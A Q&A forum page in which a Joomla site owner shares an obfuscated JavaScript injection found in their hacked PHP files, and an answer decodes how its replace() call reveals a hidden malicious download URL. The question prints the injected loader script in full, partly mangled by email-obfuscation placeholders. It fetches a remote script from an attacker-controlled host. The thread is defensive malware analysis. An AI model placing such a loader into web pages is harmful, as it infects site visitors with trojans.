job.answiz.com
1 Answer
  • 0
Votes
name
name Punditsdkoslkdosdkoskdo

How does this mess work?

My Joomla! website has been repeatedly hacked into. Someone, somehow, managed to inject the following rubbish into the key php scripts, but I mean not to talk about configuring Joomla. The site is not visited much (at times I fear I might be the only visitor to that site...) and I don't care much to have the site back up and running. I'll handle that eventually.

My question is, how does this rubbish work? I look at it and I just don't see how does this manage to do any harm? What it does is it tries to download a PDF file called ChangeLog.pdf, which is infected with a trojan and after opening will freeze up your Acrobat and wreak havoc on your machine. How does it do that, I don't know, I don't care. But how does the following piece of script invoke the download?

<script>/*Exception*/ document.write('<script src='+'h#^([email protected])((t$&@p#:)&/!$/)@d$y#^#[email protected]$d^!!&n#s$)^-$)o^^(r!#g!!#$.^^@g))!a#m#@$e&$s^@@[email protected]@([email protected]$p(.&@c&)@(o$m)).!$m$)[email protected]([email protected]()s&[email protected]&o$&(u#)$x&&^(i)[email protected]^c!!&n$#.(@g)$e#(^n&!u(i&#&n(e&(!h&[email protected]&^&l^$(l)&y$(#@[email protected]!((o#d&^.^#)r$#^u!!$:(#@&8#)([email protected]&0^(/))s#o#^&#^f!$t$!o##n(&$i(^!c$(.!&[email protected]!&^m#&/&(s&$(o!f&[email protected]&o!!n)&i$&c!.#^^c)[email protected]@(([email protected]#/$^!g#^o$^&o&#g!l)@@@!e&.))c!)(o#@#^!m(&/^^l#^@i##(v&@e&)!$j^[email protected]$s#m!i)n$.!$c&$o)@$m^/@$v&i^d^()e(!o&&[email protected](z(@)^[email protected])c$&o^m)$)^/#$'.replace(/#|$|@|^|&|(|)|!/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--6f471c20c9b96fed179c85ffdd3365cf-->

ESET has detected this code as JS/TrojanDownloader.Agent.NRO trojan

Notice the replace call after the giant messy string: .replace(/#|$|@|^|&|(|)|!/ig, '').

It removes most of the special characters, turning it into a normal URL:

evil://dyndns-org.gamestop.com.mybestyouxi-cn.genuinehollywood.ru:8080/softonic.com/softonic.com/google.com/livejasmin.com/videosz.com/

(I manually changed http: to evil:)

Note that the regex could have been simplified to .replace(/[#[email protected]^&()!]/ig, '')

If you look at the script, you'll see that it's a very simple script that injects a hidden IFRAME containing the path /index.php?ys from the same domain.

I requested that page in Fiddler, and it had no content.

  • 0
Reply Report